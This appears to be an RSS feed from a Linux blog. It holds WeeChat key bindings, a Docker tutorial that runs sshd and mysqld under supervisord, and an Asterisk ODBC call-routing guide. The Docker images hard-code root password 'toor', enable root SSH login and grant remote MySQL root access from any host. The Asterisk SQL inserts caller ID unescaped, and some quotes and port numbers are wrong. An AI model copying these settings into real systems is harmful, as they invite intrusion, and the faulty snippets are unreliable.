meta-j89 = "/buffer 89"  
meta-j90 = "/buffer 90"  
meta-j91 = "/buffer 91"  
meta-j92 = "/buffer 92"  
meta-j93 = "/buffer 93"  
meta-j94 = "/buffer 94"  
meta-j95 = "/buffer 95"  
meta-j96 = "/buffer 96"  
meta-j97 = "/buffer 97"  
meta-j98 = "/buffer 98"  
meta-j99 = "/buffer 99"  
meta-k = "/input grab_key_command"  
meta-m = "/mute mouse toggle"  
meta-n = "/window scroll_next_highlight"  
meta-p = "/window scroll_previous_highlight"  
meta-r = "/input delete_line"  
meta-s = "/mute aspell toggle"  
meta-u = "/window scroll_unread"  
meta-wmeta-meta2-A = "/window up"  
meta-wmeta-meta2-B = "/window down"  
meta-wmeta-meta2-C = "/window right"  
meta-wmeta-meta2-D = "/window left"  
meta-wmeta2-1;3A = "/window up"  
meta-wmeta2-1;3B = "/window down"  
meta-wmeta2-1;3C = "/window right"  
meta-wmeta2-1;3D = "/window left"  
meta-wmeta-b = "/window balance"  
meta-wmeta-s = "/window swap"  
meta-x = "/input zoom_merged_buffer"  
meta-z = "/window zoom"  
ctrl-_ = "/input undo"

[key_search]
ctrl-I = "/input search_switch_where"  
ctrl-J = "/input search_stop"  
ctrl-M = "/input search_stop"  
ctrl-R = "/input search_switch_regex"  
meta2-A = "/input search_previous"  
meta2-B = "/input search_next"  
meta-c = "/input search_switch_case"

[key_cursor]
ctrl-J = "/cursor stop"  
ctrl-M = "/cursor stop"  
meta-meta2-A = "/cursor move area_up"  
meta-meta2-B = "/cursor move area_down"  
meta-meta2-C = "/cursor move area_right"  
meta-meta2-D = "/cursor move area_left"  
meta2-1;3A = "/cursor move area_up"  
meta2-1;3B = "/cursor move area_down"  
meta2-1;3C = "/cursor move area_right"  
meta2-1;3D = "/cursor move area_left"  
meta2-A = "/cursor move up"  
meta2-B = "/cursor move down"  
meta2-C = "/cursor move right"  
meta2-D = "/cursor move left"  
@item(buffer_nicklist):K = "/window ${_window_number};/kickban ${nick}"
@item(buffer_nicklist):b = "/window ${_window_number};/ban ${nick}"
@item(buffer_nicklist):k = "/window ${_window_number};/kick ${nick}"
@item(buffer_nicklist):q = "/window ${_window_number};/query ${nick};/cursor stop"
@item(buffer_nicklist):w = "/window ${_window_number};/whois ${nick}"
@chat:Q = "hsignal:chat_quote_time_prefix_message;/cursor stop"
@chat:m = "hsignal:chat_quote_message;/cursor stop"
@chat:q = "hsignal:chat_quote_prefix_message;/cursor stop"

[key_mouse]
@bar(input):button2 = "/input grab_mouse_area"
@bar(nicklist):button1-gesture-down = "/bar scroll nicklist ${_window_number} +100%"
@bar(nicklist):button1-gesture-down-long = "/bar scroll nicklist ${_window_number} e"
@bar(nicklist):button1-gesture-up = "/bar scroll nicklist ${_window_number} -100%"
@bar(nicklist):button1-gesture-up-long = "/bar scroll nicklist ${_window_number} b"
@chat(script.scripts):button1 = "/window ${_window_number};/script go ${_chat_line_y}"
@chat(script.scripts):button2 = "/window ${_window_number};/script go ${_chat_line_y};/script installremove -q ${script_name_with_extension}"
@chat(script.scripts):wheeldown = "/script down 5"
@chat(script.scripts):wheelup = "/script up 5"
@item(buffer_nicklist):button1 = "/window ${_window_number};/query ${nick}"
@item(buffer_nicklist):button1-gesture-left = "/window ${_window_number};/kick ${nick}"
@item(buffer_nicklist):button1-gesture-left-long = "/window ${_window_number};/kickban ${nick}"
@item(buffer_nicklist):button2 = "/window ${_window_number};/whois ${nick}"
@item(buffer_nicklist):button2-gesture-left = "/window ${_window_number};/ban ${nick}"
@bar:wheeldown = "/bar scroll ${_bar_name} ${_window_number} +20%"
@bar:wheelup = "/bar scroll ${_bar_name} ${_window_number} -20%"
@chat:button1 = "/window ${_window_number}"
@chat:button1-gesture-left = "/window ${_window_number};/buffer -1"
@chat:button1-gesture-left-long = "/window ${_window_number};/buffer 1"
@chat:button1-gesture-right = "/window ${_window_number};/buffer +1"
@chat:button1-gesture-right-long = "/window ${_window_number};/input jump_last_buffer"
@chat:ctrl-wheeldown = "/window scroll_horiz -window ${_window_number} +10%"
@chat:ctrl-wheelup = "/window scroll_horiz -window ${_window_number} -10%"
@chat:wheeldown = "/window scroll_down -window ${_window_number}"
@chat:wheelup = "/window scroll_up -window ${_window_number}"
@*:button3 = "/cursor go ${_x},${_y}"
</code></pre>

<style>img.middlecenter{display:block;margin:0 auto;max-height:450px;width:auto}</style>]]></description><link>http://blog.roundside.com/weechat-ncurses-based-irc-client/</link><guid isPermaLink="false">0d913f7f-7b40-4168-943a-cdda3bd7d603</guid><category><![CDATA[linux]]></category><category><![CDATA[irc]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Tue, 18 Nov 2014 22:10:17 GMT</pubDate></item><item><title><![CDATA[Running multiple services in Docker container]]></title><description><![CDATA[<p><img class="middlecenter" src='http://files.roundside.com/content/docker-whale-home-logo.png' > <br />
<a href='https://www.docker.com/' >Docker</a> is amazing in application testing or when we need run something in isolated environment.</p>

<p>But sometimes needed to run <strong>daemons</strong> (such as sshd or nginx). And there is some problems begin, because in ideology of Docker when process is finished, the container will stop. This is good for single application, we run some code, see results and container stops. <br />
So, is there a solution? Yes, and the answer is <a href='https://docs.docker.com/articles/using_supervisord/' >supervisord</a>.</p>

<p>It's a python-based tool for controlling processes (including restarting on crash and much more).</p>

<p>In a nutshell is something like init for our container, supervisor has well-documented <a href='http://supervisord.org/configuration.html' >manual</a> for config files.</p>

<p>Ok, it's a game time!</p>

<p><em>I'm using Gentoo (3.16.2 kernel) and Docker 1.2.0 in this example</em></p>

<p>Let's create container for sshd service, and build it using <code>docker build</code> command:</p>

<p>create temporary directory, and write config files here</p>

<pre><code class="language-bash">[sloun@heaven ~ ] cd $(mktemp -d)
</code></pre>

<p>in Dockerfile I'll specify what packages needed to install, and what directories needed to create for sshd  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] cat Dockerfile
# vim: set syntax=dockerfile:
#sshd template
FROM debian:stable  
MAINTAINER sloun@roundside  
RUN apt-get update &amp;&amp; apt-get -y upgrade \  
&amp;&amp; apt-get -y install openssh-server supervisor \
&amp;&amp; echo 'root:toor' | chpasswd \
&amp;&amp; sed -i 's/PermitRootLogin without-password/PermitRootLogin yes/' /etc/ssh/sshd_config\
&amp;&amp; mkdir /var/run/supervisor &amp;&amp; mkdir /var/run/sshd 
#supervisord config
COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf  
EXPOSE 22  
CMD ["/usr/bin/supervisord"]
</code></pre>

<p>Now in detail:  </p>

<ul>
<li>use debian stable (wheezy so far) template  </li>
<li>specify maintainer for template  </li>
<li>update &amp; upgrade packages to latest versions  </li>
<li>set 'toor' as root password</li>
<li>if root login is not allowed, fix it using sed</li>
<li>copy supervisord.conf to /etc/supervisor/conf.d/</li>
<li>expose 22 port (more about it below)</li>
<li>run supervisord</li>
</ul>

<p>The reason to use <code>expose</code> is to make this port available <strong>in</strong> a container immediately. If not expose port, sshd also will be available, but it will take some time (up to minute!). Read more about this <a href='https://docs.docker.com/reference/run/' #expose-incoming-ports">here</a>.</p>

<p>Now, create config file for supervisor (supervisord.conf), simple config for <strong>sshd</strong> looks like this:  </p>

<pre><code class="language-bash">[supervisord]
nodaemon=true

[program:sshd]
command=/usr/sbin/sshd -D  
</code></pre>

<p>Ok. We have Dockerfile and supervisord.conf in directory:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] l
total 8  
-rw-r--r-- 1 sloun sloun 706 Nov 18 03:36 Dockerfile
-rw-r--r-- 1 sloun sloun 166 Nov 18 03:14 supervisord.conf
</code></pre>

<p>Time for creating container:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker build -t debian:sshd .
</code></pre>

<blockquote>
  <p>about tag </p>
</blockquote>

<p>-t is a tag option to specify local repository for this container</p>

<p>That's all. Start container and expose local port to it:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker run -d -p 127.0.0.1:1030:22 debian:sshd
</code></pre>

<p>Sshd now available at 127.1:1030</p>

<h3 id="mysqldandsshdinonecontainer">Mysqld and sshd in one container</h3>

<p>Run mysql in that way is also very easy. But there are some pitfalls:</p>

<ul>
<li>mysqld run on loopback</li>
<li>no users by default</li>
<li>remote root login is forbidden  </li>
</ul>

<p>So, my easiest <strong>Dockerfile</strong> looks like this:   </p>

<pre><code class="language-bash"># vim: set syntax=dockerfile:
#sshd-mysqld template
FROM debian:stable  
MAINTAINER sloun@roundside  
RUN apt-get update &amp;&amp; apt-get -y upgrade \  
&amp;&amp; apt-get -y install openssh-server mysql-server supervisor \
&amp;&amp; echo 'root:toor' | chpasswd \
&amp;&amp; sed -i 's/PermitRootLogin without-password/PermitRootLogin yes/' /etc/ssh/sshd_config \
&amp;&amp; sed -i 's/bind-address.\+/bind-address=0.0.0.0/' /etc/mysql/my.cnf \
&amp;&amp; mkdir /var/run/supervisor &amp;&amp; mkdir /var/run/sshd
#supervisord config
COPY ./supervisord.conf /etc/supervisor/conf.d/supervisord.conf  
#ports
EXPOSE 22  
EXPOSE 3306  
#stuff for mysql
COPY ./mysql.sh /opt/mysql.sh  
#run supervisord
CMD ["/usr/bin/supervisord"]  
</code></pre>

<ul>
<li>First, bind mysqld on all available interfaces using sed</li>
<li>expose mysqld port</li>
<li>add little shell scipt (<strong>mysql.sh, must be executable</strong>) for adding remote root login</li>
</ul>

<p><strong>mysql.sh:</strong></p>

<pre><code>#!/usr/bin/env bash
echo "GRANT ALL ON *.* TO root@'%' IDENTIFIED BY 'toor' WITH GRANT OPTION; FLUSH PRIVILEGES" | mysql  
</code></pre>

<p>And updated <strong>supervisord.conf:</strong>  </p>

<pre><code class="language-bash">[supervisord]
nodaemon=true

[program:sshd]
command=/usr/sbin/sshd -D

[program:mysqld]
command=/usr/bin/mysqld_safe

[program:mysql-configure]
command=/opt/mysql.sh
</code></pre>

<p>Build and run.</p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker build -t debian:sshd_mysqld .
</code></pre>

<pre><code class="languge-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker run -d -p 127.0.0.1:1040:22 -p 127.0.0.1:1041:3306 debian:sshd_mysqld
</code></pre>

<p><br />
Look in <code>docker ps</code>:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker ps
CONTAINER ID        IMAGE               COMMAND                CREATED             STATUS              PORTS                                              NAMES  
9e197bc92b64        debian:sshd_mysqld    "/usr/bin/supervisor   30 minutes ago      Up 30 minutes       127.0.0.1:1040-&gt;22/tcp, 127.0.0.1:1041-&gt;3306/tcp   insane_franklin  
</code></pre>

<p>Now, mysql root login is available at 127.1:4041, and ssh on :4040.</p>

<p>Also, <a href='https://docs.docker.com/userguide/dockerlinks/' >linking</a> containers together is also cool for this!</p>

<p>Thanks to <a href='http://txt.fliglio.com/2013/11/creating-a-mysql-docker-container/' >http://txt.fliglio.com/2013/11/creating-a-mysql-docker-container/</a></p>

<style>img.middlecenter{display:block;margin:0 auto;max-height:450px;width:auto}</style>]]></description><link>http://blog.roundside.com/running-miltiple-services-in-docker-container/</link><guid isPermaLink="false">04e29239-a202-4fd6-928d-3ca2ef462cb6</guid><category><![CDATA[virtualization]]></category><category><![CDATA[linux]]></category><category><![CDATA[containers]]></category><category><![CDATA[docker]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 17 Nov 2014 14:15:00 GMT</pubDate></item><item><title><![CDATA[Smart calls routing in Asterisk (using mysql or postgresql via odbc)]]></title><description><![CDATA[<p><img style="height:200px;width:auto;margin:0 auto;display:block" src='http://files.roundside.com/content/Asterisk_Logo.png' > <br />
Good day, dear all!</p>

<p>I think it's very useful when some specific calls going to some specific peer (i.e. manager/support team department). <br />
For example, when your friend Alice calls to your bungalow-office, only your phone (pc/laptop) should ring. <br />
That's not so hard with asterisk and you favorite DB (I'll try with mysql). <br />
So, all we need is:</p>

<ul>
<li>Asterisk  </li>
<li>[you favorite] *nix distro  </li>
<li>unixodbc  </li>
<li>libmyodbc - for mysql  </li>
<li>odbc-postgresql - for postgresql</li>
<li>brain  </li>
</ul>

<p><a href='http://http//en.wikipedia.org/wiki/Open_Database_Connectivity' >Odbc</a> (Open Database Connectivity) is something like high-level api for relational db's. Maybe it's little bit old, but it's just works (c)</p>

<p>Besides, there are Asterisk mysql-addon for direct mysql connection (with limited functionality) but odbc is much powerful and flexible.</p>

<p>Ok. After odbc stuff is installed it's time to configure connection parameters:</p>

<h3 id="odbcpart">Odbc part:</h3>

<p>In <br />
<strong>/etc/odbc.ini</strong>
stored DB's credentials and connection options: <br />
(<strong>Note</strong>: you may specify credentials and options in <strong>res_odbc.conf</strong>, especially if you have multiple databases and want to keep all in one place)</p>

<pre><code class="language-bash">[asterisk_server_db]
Driver       = MySQL  
Description  = MySQL ODBC 3.51 Driver DSN  
Server       = 127.1  
Port         = 3306  
User         = justin  
Password     = nobodyknowsmypassword  
Database     = bieber  
Option       = 3  
Socket       =  
</code></pre>

<p>In <br />
<strong>/etc/odbcinst.ini</strong> <br />
must be libraries location (depends of distro)  </p>

<pre><code class="language-bash">[MySQL]
Description     = MySQL driver  
Driver          = libmyodbc.so  
Setup           = libodbcmyS.so  
CPTimeout       =  
CPReuse         =
</code></pre>

<p><br />
Check connection to database:  </p>

<pre><code class="language-bash">[root@some:~] isql bieber
</code></pre>

<p>if you see this  </p>

<pre><code class="language-bash">+---------------------------------------+
| Connected!                            |
|                                       |
| sql-statement                         |
| help [tablename]                      |
| quit                                  |
|                                       |
+---------------------------------------+
SQL&gt;  
</code></pre>

<p>than all is fine (try to make some requests to DB too), time to configure connection from Asterisk.</p>

<h3 id="asteriskpart">Asterisk part:</h3>

<p>Set database(s) for Asterisk odbc resources: <br />
<strong>/etc/asterisk/res_odbc.conf</strong></p>

<pre><code>[asterisk_db]
enabled=&gt;yes  
dsn=&gt;asterisk_server_db  
pooling=&gt;no  
pre-connect=&gt;yes
</code></pre>

<blockquote>
  <p>dsn  </p>
</blockquote>

<p><em>is the database specified in /etc/odbc.ini</em></p>

<blockquote>
  <p>pre-connect  </p>
</blockquote>

<p><em>is recommended for reduce requests time</em>  </p>

<p>also, <strong>connection credentials can be specified</strong> in this file, instead /etc/odbc.ini</p>

<p>Now, it's time to set functions that we will later call from dialplan: <br />
<strong>/etc/asterisk/func_odbc.conf</strong></p>

<pre><code class="language-bash">[MANAGER_STATE]
prefix=check  
dsn=asterisk_db  
readsql = SELECT `users` FROM `all` WHERE `TEL` LIKE REPLACE('${ARG1}', '+1 '') LIMIT 1
</code></pre>

<blockquote>
  <p>prefix</p>
</blockquote>

<p>is optional, but it's good for human-friendly marking. Using this prefix our function will look like <strong>check<em>_</em>MANAGER<em>_</em>STATE</strong> instead <strong>ODBC<em>_</em>MANAGER<em>_</em>STATE</strong>  </p>

<blockquote>
  <p>dsn  </p>
</blockquote>

<p>is the resource from res_odbc.conf</p>

<p>and  </p>

<blockquote>
  <p>readsql  </p>
</blockquote>

<p>is one of two operation modes (another are write)</p>

<p>Now time for play with dialplan:</p>

<pre><code class="language-bash">exten =&gt; 106,1,Set(Check_manager=${check_MANAGER_STATE(${CALLERID(num)})})  
exten =&gt; 106,n,Set(DialTarget=${IF($[${LEN(${Check_manager})} != 0]?Sip/${Check_manager}:${DIALALL})})  
exten =&gt; 106,n,Dial(${DialTarget})  
exten =&gt; 106,n,Playback(${NBAV})  
exten =&gt; 106,n,Hangup()  
</code></pre>

<p>Suppose, our number is 106 (Alice number is +10XXXXXXXXXXXXXX), before AppDial will run, Asterisk function make request to table <code>all</code> and search for CID in column <code>TEL</code> (LIKE REPLACE removes +1 code if exist).  </p>

<pre><code class="language-bash">+--------------------------------------------------------------+
| users  | TEL                                
+--------------------------------------------------------------+
| 106    | 0XXXXXXXXXXXXXX
+--------------------------------------------------------------+
</code></pre>

<p>And if there are user from <code>users</code> column with corresponding CID from <code>TEL</code> column, user saved in <code>Check_manager</code> variable and then call going to this user. <br />
We have also check that user was found:  </p>

<pre><code class="language-bash">106,n,Set(DialTarget=${IF($[${LEN(${Check_manager})} != 0]?Sip/${Check_manager}:${DIALALL})})  
</code></pre>

<p>If <strong>no user was found</strong>, <code>${LEN(${Check_manager})}</code> (length of variable) returns zero and <strong>DialTarget</strong> takes <strong>DIALALL</strong> value (call to all available peers, for example).</p>

<p><strong>Sure, this is extra basic example. The are a lot of space for ideas about Asterisk interactivity and much more.</strong></p>]]></description><link>http://blog.roundside.com/smart-call-routing-in-asterisk-using-mysql-or-postgresql-via-odbc/</link><guid isPermaLink="false">452af868-5779-4703-8ff9-2d2de29227ed</guid><category><![CDATA[linux]]></category><category><![CDATA[asterisk]]></category><category><![CDATA[voip]]></category><category><![CDATA[sql]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Wed, 12 Nov 2014 21:21:51 GMT</pubDate></item></channel></rss>